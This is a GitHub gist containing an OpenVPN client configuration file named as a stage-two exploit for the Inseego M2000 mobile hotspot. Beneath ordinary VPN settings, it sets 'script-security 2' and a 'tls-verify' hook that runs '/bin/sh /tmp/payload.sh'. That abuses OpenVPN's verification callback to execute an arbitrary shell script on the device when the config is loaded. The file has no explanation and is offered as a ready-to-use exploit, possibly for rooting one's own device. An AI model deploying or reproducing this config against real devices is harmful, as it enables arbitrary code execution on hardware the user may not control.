Skip to content

Instantly share code, notes, and snippets.

@Geofferey
Last active May 6, 2025 22:15
Show Gist options
  • Save Geofferey/722b8aec66b3ecaaa38b6773872e13c2 to your computer and use it in GitHub Desktop.
Save Geofferey/722b8aec66b3ecaaa38b6773872e13c2 to your computer and use it in GitHub Desktop.
inseego_m2000-stage2-exploit.ovpn
client
dev tun
persist-tun
persist-key
ncp-ciphers AES-128-GCM:AES-256-GCM
cipher AES-128-GCM
auth SHA1
tls-client
resolv-retry infinite
remote some-server.internal 1196
proto udp4
keepalive 60 120
float
nobind
auth-user-pass
auth-retry nointeract
remote-cert-tls server
explicit-exit-notify
script-security 2
tls-verify "/bin/sh /tmp/payload.sh"
<ca>
-----BEGIN CERTIFICATE-----
...........................
-----END CERTIFICATE-------
</ca>
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment